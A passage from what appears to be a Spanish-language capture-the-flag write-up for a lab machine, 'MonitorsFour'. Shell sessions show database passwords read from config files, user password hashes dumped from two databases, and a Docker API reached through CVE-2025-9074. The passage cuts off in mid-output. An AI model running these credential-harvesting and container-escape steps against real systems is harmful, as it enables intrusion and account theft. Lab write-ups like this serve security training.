class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@821fbd6a43fa:~/html/cacti$ cat include/config.php </span></span><span class="line"><span class="cl">cat include/config.php </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl">/* </span></span><span class="line"><span class="cl"> +-------------------------------------------------------------------------+ </span></span><span class="line"><span class="cl"> <span class="p">|</span> Copyright <span class="o">(</span>C<span class="o">)</span> 2004-2024 The Cacti Group <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> This program is free software<span class="p">;</span> you can redistribute it and/or <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> modify it under the terms of the GNU General Public License <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> as published by the Free Software Foundation<span class="p">;</span> either version <span class="m">2</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> of the License, or <span class="o">(</span>at your option<span class="o">)</span> any later version. <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> This program is distributed in the hope that it will be useful, <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> but WITHOUT ANY WARRANTY<span class="p">;</span> without even the implied warranty of <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> GNU General Public License <span class="k">for</span> more details. <span class="p">|</span> </span></span><span class="line"><span class="cl"> +-------------------------------------------------------------------------+ </span></span><span class="line"><span class="cl"> <span class="p">|</span> Cacti: The Complete RRDtool-based Graphing Solution <span class="p">|</span> </span></span><span class="line"><span class="cl"> +-------------------------------------------------------------------------+ </span></span><span class="line"><span class="cl"> <span class="p">|</span> This code is designed, written, and maintained by the Cacti Group. See <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> about.php and/or the AUTHORS file <span class="k">for</span> specific developer information. <span class="p">|</span> </span></span><span class="line"><span class="cl"> +-------------------------------------------------------------------------+ </span></span><span class="line"><span class="cl"> <span class="p">|</span> http://www.cacti.net/ <span class="p">|</span> </span></span><span class="line"><span class="cl"> +-------------------------------------------------------------------------+ </span></span><span class="line"><span class="cl">*/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">/** </span></span><span class="line"><span class="cl"> * Make sure these values reflect your actual database/host/user/password </span></span><span class="line"><span class="cl"> */ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$database_type</span> <span class="o">=</span> <span class="s1">&#39;mysql&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database_default</span> <span class="o">=</span> <span class="s1">&#39;cacti&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database_hostname</span> <span class="o">=</span> <span class="s1">&#39;mariadb&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database_username</span> <span class="o">=</span> <span class="s1">&#39;cactidbuser&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database_password</span> <span class="o">=</span> <span class="s1">&#39;7pyrf6ly8qx4&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database_port</span> <span class="o">=</span> <span class="s1">&#39;3306&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database_retries</span> <span class="o">=</span> 5<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database_ssl</span> <span class="o">=</span> false<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database_ssl_key</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database_ssl_cert</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database_ssl_ca</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database_persist</span> <span class="o">=</span> false<span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># [.. cut ..]</span> </span></span></code></pre></td></tr></table> </div> </div><p>En la raiz descubrimos el archivo <code>.dockerenv</code> lo cual indica que cacti corre en contenedor docker como se indicaba en el changelog.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@821fbd6a43fa:~/html/cacti$ ls -lah / </span></span><span class="line"><span class="cl">total 7.4M </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> root root 4.0K Dec <span class="m">7</span> 04:51 . </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> root root 4.0K Dec <span class="m">7</span> 04:51 .. </span></span><span class="line"><span class="cl">-rwxr-xr-x <span class="m">1</span> root root <span class="m">0</span> Nov <span class="m">10</span> 17:04 .dockerenv </span></span><span class="line"><span class="cl">lrwxrwxrwx <span class="m">1</span> root root <span class="m">7</span> Aug <span class="m">24</span> 16:20 bin -&gt; usr/bin </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">2</span> root root 4.0K Aug <span class="m">24</span> 16:20 boot </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">5</span> root root <span class="m">340</span> Dec <span class="m">6</span> 22:32 dev </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> root root 4.0K Nov <span class="m">10</span> 17:04 etc </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> root root 4.0K Nov <span class="m">10</span> 16:15 home </span></span><span class="line"><span class="cl">lrwxrwxrwx <span class="m">1</span> root root <span class="m">7</span> Aug <span class="m">24</span> 16:20 lib -&gt; usr/lib </span></span><span class="line"><span class="cl">lrwxrwxrwx <span class="m">1</span> root root <span class="m">9</span> Aug <span class="m">24</span> 16:20 lib64 -&gt; usr/lib64 </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">2</span> root root 4.0K Nov <span class="m">3</span> 20:44 media </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">2</span> root root 4.0K Nov <span class="m">3</span> 20:44 mnt </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">2</span> root root 4.0K Nov <span class="m">3</span> 20:44 opt </span></span><span class="line"><span class="cl">dr-xr-xr-x <span class="m">191</span> root root <span class="m">0</span> Dec <span class="m">6</span> 22:32 proc </span></span><span class="line"><span class="cl">drwx------ <span class="m">2</span> root root 4.0K Nov <span class="m">3</span> 20:44 root </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> root root 4.0K Nov <span class="m">10</span> 17:05 run </span></span><span class="line"><span class="cl">lrwxrwxrwx <span class="m">1</span> root root <span class="m">8</span> Aug <span class="m">24</span> 16:20 sbin -&gt; usr/sbin </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">2</span> root root 4.0K Nov <span class="m">3</span> 20:44 srv </span></span><span class="line"><span class="cl">-rwxr-xr-x <span class="m">1</span> root root <span class="m">113</span> Sep <span class="m">13</span> 06:13 start.sh </span></span><span class="line"><span class="cl">dr-xr-xr-x <span class="m">13</span> root root <span class="m">0</span> Dec <span class="m">7</span> 05:03 sys </span></span><span class="line"><span class="cl">drwxrwxrwt <span class="m">1</span> root root 7.3M Dec <span class="m">7</span> 05:00 tmp </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> root root 4.0K Nov <span class="m">3</span> 20:44 usr </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> root root 4.0K Nov <span class="m">4</span> 04:06 var </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:~/html/cacti$ </span></span></code></pre></td></tr></table> </div> </div><p>Encontramos el codigo fuente de la aplicacion en el dominio principal tambien, las credenciales para la base de datos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@821fbd6a43fa:~$ ls -lah app </span></span><span class="line"><span class="cl">total 36K </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> www-data www-data 4.0K Oct <span class="m">30</span> 08:12 . </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> root root 4.0K Nov <span class="m">10</span> 17:01 .. </span></span><span class="line"><span class="cl">-rwxr-xr-x <span class="m">1</span> www-data www-data <span class="m">97</span> Sep <span class="m">13</span> 05:37 .env </span></span><span class="line"><span class="cl">-rwxr-xr-x <span class="m">1</span> www-data www-data 2.9K Sep <span class="m">13</span> 05:31 Router.php </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> www-data www-data 4.0K Nov <span class="m">10</span> 17:01 controllers </span></span><span class="line"><span class="cl">-rwxr-xr-x <span class="m">1</span> www-data www-data 2.3K Sep <span class="m">13</span> 05:31 index.php </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> www-data www-data 4.0K Oct <span class="m">30</span> 08:12 static </span></span><span class="line"><span class="cl">drwxr-xr-x <span class="m">1</span> www-data www-data 4.0K Oct <span class="m">30</span> 08:12 views </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:~$ <span class="nb">cd</span> app </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:~/app$ cat .env </span></span><span class="line"><span class="cl"><span class="nv">DB_HOST</span><span class="o">=</span>mariadb </span></span><span class="line"><span class="cl"><span class="nv">DB_PORT</span><span class="o">=</span><span class="m">3306</span> </span></span><span class="line"><span class="cl"><span class="nv">DB_NAME</span><span class="o">=</span>monitorsfour_db </span></span><span class="line"><span class="cl"><span class="nv">DB_USER</span><span class="o">=</span>monitorsdbuser </span></span><span class="line"><span class="cl"><span class="nv">DB_PASS</span><span class="o">=</span>f37p2j8f4t0r </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:~/app$ </span></span></code></pre></td></tr></table> </div> </div><p>La base de datos tiene registrados la informacion de usuarios anterior observada en la API.<br /> <div class="expand"> <button type="button" class="expand__button" aria-label="Expand Button"> <span class="expand-icon expand-icon__right"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M9.29 15.88L13.17 12 9.29 8.12c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0l4.59 4.59c.39.39.39 1.02 0 1.41L10.7 17.3c-.39.39-1.02.39-1.41 0-.38-.39-.39-1.03 0-1.42z"/></svg> </span> Expand me </button> <div class="expand__content"> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P <span class="m">3306</span> -u monitorsdbuser -pf37p2j8f4t0r -D monitorsfour_db -e <span class="s2">&#34;show tables;&#34;</span> </span></span><span class="line"><span class="cl">&lt;-pf37p2j8f4t0r -D monitorsfour_db -e <span class="s2">&#34;show tables;&#34;</span> </span></span><span class="line"><span class="cl">Tables_in_monitorsfour_db </span></span><span class="line"><span class="cl">changelog </span></span><span class="line"><span class="cl">customers </span></span><span class="line"><span class="cl">invoice_tasks </span></span><span class="line"><span class="cl">invoices </span></span><span class="line"><span class="cl">tasks </span></span><span class="line"><span class="cl">users </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P <span class="m">3306</span> -u monitorsdbuser -pf37p2j8f4t0r -D monitorsfour_db -e <span class="s2">&#34;describe users;&#34;</span> </span></span><span class="line"><span class="cl">&lt;37p2j8f4t0r -D monitorsfour_db -e <span class="s2">&#34;describe users;&#34;</span> </span></span><span class="line"><span class="cl">Field Type Null Key Default Extra </span></span><span class="line"><span class="cl">id int<span class="o">(</span>11<span class="o">)</span> NO PRI NULL auto_increment </span></span><span class="line"><span class="cl">username varchar<span class="o">(</span>50<span class="o">)</span> NO UNI NULL </span></span><span class="line"><span class="cl">email varchar<span class="o">(</span>100<span class="o">)</span> NO NULL </span></span><span class="line"><span class="cl">password varchar<span class="o">(</span>100<span class="o">)</span> NO NULL </span></span><span class="line"><span class="cl">role varchar<span class="o">(</span>50<span class="o">)</span> NO user </span></span><span class="line"><span class="cl">token varchar<span class="o">(</span>255<span class="o">)</span> YES NULL </span></span><span class="line"><span class="cl">name varchar<span class="o">(</span>100<span class="o">)</span> NO NULL </span></span><span class="line"><span class="cl">position varchar<span class="o">(</span>100<span class="o">)</span> NO NULL </span></span><span class="line"><span class="cl">dob date NO NULL </span></span><span class="line"><span class="cl">start_date date NO NULL </span></span><span class="line"><span class="cl">salary decimal<span class="o">(</span>10,2<span class="o">)</span> NO NULL </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P <span class="m">3306</span> -u monitorsdbuser -pf37p2j8f4t0r -D monitorsfour_db -e <span class="s2">&#34;select username, email, password, role from users;&#34;</span> </span></span><span class="line"><span class="cl">&lt;<span class="k">select</span> username, email, password, role from users<span class="p">;</span><span class="s2">&#34; </span></span></span><span class="line"><span class="cl"><span class="s2">username email password role </span></span></span><span class="line"><span class="cl"><span class="s2">admin admin@monitorsfour.htb 56b32eb43e6f15395f6c46c1c9e1cd36 super user </span></span></span><span class="line"><span class="cl"><span class="s2">mwatson mwatson@monitorsfour.htb 69196959c16b26ef00b77d82cf6eb169 admin </span></span></span><span class="line"><span class="cl"><span class="s2">janderson janderson@monitorsfour.htb 2a22dcf99190c322d974c8df5ba3256b user </span></span></span><span class="line"><span class="cl"><span class="s2">dthompson dthompson@monitorsfour.htb 8d4a7e7fd08555133e056d9aacb1e519 user </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@821fbd6a43fa:~/app/controllers</span>$<span class="s2"> </span></span></span></code></pre></td></tr></table> </div> </div> </div> </div></p> <p>Dentro de la base de datos de Cacti se encontraron dos hashes para usuarios.<br /> <div class="expand"> <button type="button" class="expand__button" aria-label="Expand Button"> <span class="expand-icon expand-icon__right"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M9.29 15.88L13.17 12 9.29 8.12c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0l4.59 4.59c.39.39.39 1.02 0 1.41L10.7 17.3c-.39.39-1.02.39-1.41 0-.38-.39-.39-1.03 0-1.42z"/></svg> </span> Expand me </button> <div class="expand__content"> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P <span class="m">3306</span> -u cactidbuser -p7pyrf6ly8qx4 -D cacti -e <span class="s2">&#34;show tables;&#34;</span> </span></span><span class="line"><span class="cl">&lt;ctidbuser -p7pyrf6ly8qx4 -D cacti -e <span class="s2">&#34;show tables;&#34;</span> </span></span><span class="line"><span class="cl">Tables_in_cacti </span></span><span class="line"><span class="cl">aggregate_graph_templates </span></span><span class="line"><span class="cl"><span class="c1"># [... cut ...]</span> </span></span><span class="line"><span class="cl">user_auth </span></span><span class="line"><span class="cl">user_auth_cache </span></span><span class="line"><span class="cl">user_auth_group </span></span><span class="line"><span class="cl">user_auth_group_members </span></span><span class="line"><span class="cl">user_auth_group_perms </span></span><span class="line"><span class="cl">user_auth_group_realm </span></span><span class="line"><span class="cl">user_auth_perms </span></span><span class="line"><span class="cl">user_auth_realm </span></span><span class="line"><span class="cl">user_auth_row_cache </span></span><span class="line"><span class="cl">user_domains </span></span><span class="line"><span class="cl">user_domains_ldap </span></span><span class="line"><span class="cl">user_log </span></span><span class="line"><span class="cl">vdef </span></span><span class="line"><span class="cl">vdef_items </span></span><span class="line"><span class="cl">version </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P <span class="m">3306</span> -u cactidbuser -p7pyrf6ly8qx4 -D cacti -e <span class="s2">&#34;describe user_auth;&#34;</span> </span></span><span class="line"><span class="cl">&lt;er -p7pyrf6ly8qx4 -D cacti -e <span class="s2">&#34;describe user_auth;&#34;</span> </span></span><span class="line"><span class="cl">Field Type Null Key Default Extra </span></span><span class="line"><span class="cl">id mediumint<span class="o">(</span>8<span class="o">)</span> unsigned NO PRI NULL auto_increment </span></span><span class="line"><span class="cl">username varchar<span class="o">(</span>50<span class="o">)</span> NO MUL 0 </span></span><span class="line"><span class="cl">password varchar<span class="o">(</span>256<span class="o">)</span> NO </span></span><span class="line"><span class="cl">realm mediumint<span class="o">(</span>8<span class="o">)</span> NO MUL 0 </span></span><span class="line"><span class="cl">full_name varchar<span class="o">(</span>100<span class="o">)</span> YES 0 </span></span><span class="line"><span class="cl">email_address varchar<span class="o">(</span>128<span class="o">)</span> YES NULL </span></span><span class="line"><span class="cl">must_change_password char<span class="o">(</span>2<span class="o">)</span> YES NULL </span></span><span class="line"><span class="cl">password_change char<span class="o">(</span>2<span class="o">)</span> YES on </span></span><span class="line"><span class="cl">show_tree char<span class="o">(</span>2<span class="o">)</span> YES on </span></span><span class="line"><span class="cl">show_list char<span class="o">(</span>2<span class="o">)</span> YES on </span></span><span class="line"><span class="cl">show_preview char<span class="o">(</span>2<span class="o">)</span> NO on </span></span><span class="line"><span class="cl">graph_settings char<span class="o">(</span>2<span class="o">)</span> YES NULL </span></span><span class="line"><span class="cl">login_opts tinyint<span class="o">(</span>3<span class="o">)</span> unsigned NO 1 </span></span><span class="line"><span class="cl">policy_graphs tinyint<span class="o">(</span>3<span class="o">)</span> unsigned NO 1 </span></span><span class="line"><span class="cl">policy_trees tinyint<span class="o">(</span>3<span class="o">)</span> unsigned NO 1 </span></span><span class="line"><span class="cl">policy_hosts tinyint<span class="o">(</span>3<span class="o">)</span> unsigned NO 1 </span></span><span class="line"><span class="cl">policy_graph_templates tinyint<span class="o">(</span>3<span class="o">)</span> unsigned NO 1 </span></span><span class="line"><span class="cl">enabled char<span class="o">(</span>2<span class="o">)</span> NO MUL on </span></span><span class="line"><span class="cl">lastchange int<span class="o">(</span>11<span class="o">)</span> NO -1 </span></span><span class="line"><span class="cl">lastlogin int<span class="o">(</span>11<span class="o">)</span> NO -1 </span></span><span class="line"><span class="cl">password_history varchar<span class="o">(</span>4096<span class="o">)</span> NO -1 </span></span><span class="line"><span class="cl">locked varchar<span class="o">(</span>3<span class="o">)</span> NO </span></span><span class="line"><span class="cl">failed_attempts int<span class="o">(</span>5<span class="o">)</span> NO 0 </span></span><span class="line"><span class="cl">lastfail int<span class="o">(</span>10<span class="o">)</span> unsigned NO 0 </span></span><span class="line"><span class="cl">reset_perms int<span class="o">(</span>10<span class="o">)</span> unsigned NO 0 </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P <span class="m">3306</span> -u cactidbuser -p7pyrf6ly8qx4 -D cacti -e <span class="s2">&#34;select username,password,realm,password_history from user_auth;&#34;</span> </span></span><span class="line"><span class="cl">&lt;me,password,realm,password_history from user_auth<span class="p">;</span><span class="s2">&#34; </span></span></span><span class="line"><span class="cl"><span class="s2">username password realm password_history </span></span></span><span class="line"><span class="cl"><span class="s2">admin </span><span class="nv">$2</span><span class="s2">y</span><span class="nv">$10$wqlo06C4isr4q9xhqI</span><span class="s2">/UQOpyM/n8EDzYl/GndqhDh/2LQihzPdHWO 0 -1 </span></span></span><span class="line"><span class="cl"><span class="s2">guest 43e9a4ab75570f5b 0 -1 </span></span></span><span class="line"><span class="cl"><span class="s2">marcus </span><span class="nv">$2</span><span class="s2">y</span><span class="nv">$10$bPWlnZYLhoDUawu4x8vLAuCIaDbqIUe4s9t9HqFm</span><span class="s2">/1gtbavD/eKGe 0 </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@821fbd6a43fa:~/app/controllers</span>$<span class="s2"> </span></span></span></code></pre></td></tr></table> </div> </div> </div> </div></p> <h1 id="root-via-cve-2025-9074-docker">root via CVE-2025-9074 (Docker)</h1> <p>El Changelog muestra <code>Docker Desktop 4.44.2</code>, esta version permite acceder a contenedores Linux a la API de Docker a traves de la subnet por default (<code>192.168.65.7:2375</code>), esto permite administrar contenedores, crear nuevos contenedores e imagenes, con ello, posiblemente acceder al almacenamiento host de ejecutarse Docker en WSL, montando el disco host. Esto ultimo podria indicar el caso de la maquina, ya que el puerto WinRM esta a la escucha pero tenemos acesso a un contenedor Linux.</p> <ul> <li><a href="https://socprime.com/blog/cve-2025-9074-docker-desktop-vulnerability/">CVE-2025-9074</a>.</li> </ul> <table> <thead> <tr> <th align="right">Version</th> <th>Date</th> <th>Title</th> <th>Change</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td align="right">V.1.7</td> <td>May 16, 2025</td> <td>Infrastructure Notice</td> <td>Infrastructure</td> <td>Migrated MonitorsFour infrastructure to Windows and Docker Desktop 4.44.2, enabling containerized deployments for improved portability, scalability, and easier environment management.</td> </tr> </tbody> </table> <p>Verificamos con una solicitud curl a <code>192.168.65.7:2375/info</code>, este muestra informacion de docker.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@821fbd6a43fa:~/html/cacti$ curl -s 192.168.65.7:2375/info </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;ID&#34;</span>:<span class="s2">&#34;e9938dea-4226-47b1-9455-ca938cb3e01a&#34;</span>,<span class="s2">&#34;Containers&#34;</span>:2,<span class="s2">&#34;ContainersRunning&#34;</span>:2,<span class="s2">&#34;ContainersPaused&#34;</span>:0,<span class="s2">&#34;ContainersStopped&#34;</span>:0,<span class="s2">&#34;Images&#34;</span>:3,<span class="s2">&#34;Driver&#34;</span>:<span class="s2">&#34;overlayfs&#34;</span>,<span class="s2">&#34;DriverStatus&#34;</span>:<span class="o">[[</span><span class="s2">&#34;driver-type&#34;</span>,<span class="s2">&#34;io.containerd.snapshotter.v1&#34;</span><span class="o">]]</span>,<span class="s2">&#34;Plugins&#34;</span>:<span class="o">{</span><span class="s2">&#34;Volume&#34;</span>:<span class="o">[</span><span class="s2">&#34;local&#34;</span><span class="o">]</span>,<span class="s2">&#34;Network&#34;</span>:<span class="o">[</span><span class="s2">&#34;bridge&#34;</span>,<span class="s2">&#34;host&#34;</span>,<span class="s2">&#34;ipvlan&#34;</span>,<span class="s2">&#34;macvlan&#34;</span>,<span class="s2">&#34;null&#34;</span>,<span class="s2">&#34;overlay&#34;</span><span class="o">]</span>,<span class="s2">&#34;Authorization&#34;</span>:null,<span class="s2">&#34;Log&#34;</span>:<span class="o">[</span><span class="s2">&#34;awslogs&#34;</span>,<span class="s2">&#34;fluentd&#34;</span>,<span class="s2">&#34;gcplogs&#34;</span>,<span class="s2">&#34;gelf&#34;</span>,<span class="s2">&#34;journald&#34;</span>,<span class="s2">&#34;json-file&#34;</span>,<span class="s2">&#34;local&#34;</span>,<span class="s2">&#34;splunk&#34;</span>,<span class="s2">&#34;syslog&#34;</span><span class="o">]}</span>,<span class="s2">&#34;MemoryLimit&#34;</span>:true,<span class="s2">&#34;SwapLimit&#34;</span>:true,<span class="s2">&#34;CpuCfsPeriod&#34;</span>:true,<span class="s2">&#34;CpuCfsQuota&#34;</span>:true,<span class="s2">&#34;CPUShares&#34;</span>:true,<span class="s2">&#34;CPUSet&#34;</span>:true,<span class="s2">&#34;PidsLimit&#34;</span>:true,<span class="s2">&#34;IPv4Forwarding&#34;</span>:true,<span class="s2">&#34;Debug&#34;</span>:false,<span class="s2">&#34;NFd&#34;</span>:81,<span class="s2">&#34;OomKillDisable&#34;</span>:false,<span class="s2">&#34;NGoroutines&#34;</span>:108,<span class="s2">&#34;SystemTime&#34;</span>:<span class="s2">&#34;2026-02-02T07:15:15.986297504Z&#34;</span>,<span class="s2">&#34;LoggingDriver&#34;</span>:<span class="s2">&#34;json-file&#34;</span>,<span class="s2">&#34;CgroupDriver&#34;</span>:<span class="s2">&#34;cgroupfs&#34;</span>,<span class="s2">&#34;CgroupVersion&#34;</span>:<span class="s2">&#34;2&#34;</span>,<span class="s2">&#34;NEventsListener&#34;</span>:12,<span class="s2">&#34;KernelVersion&#34;</span>:<span class="s2">&#34;6.6.87.2-microsoft-standard-WSL2&#34;</span>,<span class="s2">&#34;OperatingSystem&#34;</span>:<span class="s2">&#34;Docker Desktop&#34;</span>,<span class="s2">&#34;OSVersion&#34;</span>:<span class="s2">&#34;&#34;</span>,<span class="s2">&#34;OSType&#34;</span>:<span class="s2">&#34;linux&#34;</span>,<span class="s2">&#34;Architecture&#34;</span>:<span class="s2">&#34;x86_64&#34;</span>,<span class="s2">&#34;IndexServerAddress&#34;</span>:<span class="s2">&#34;https://index.docker.io/v1/&#34;</span>,<span class="s2">&#34;RegistryConfig&#34;</span>:<span class="o">{</span><span class="s2">&#34;IndexConfigs&#34;</span>:<span class="o">{</span><span class="s2">&#34;docker.io&#34;</span>:<span class="o">{</span><span class="s2">&#34;Mirrors&#34;</span>:<span class="o">[]</span>,<span class="s2">&#34;Name&#34;</span>:<span class="s2">&#34;docker.io&#34;</span>,<span class="s2">&#34;Official&#34;</span>:true,<span class="s2">&#34;Secure&#34;</span>:true<span class="o">}</span>,<span class="s2">&#34;hubproxy.docker.internal:5555&#34;</span>:<span class="o">{</span><span 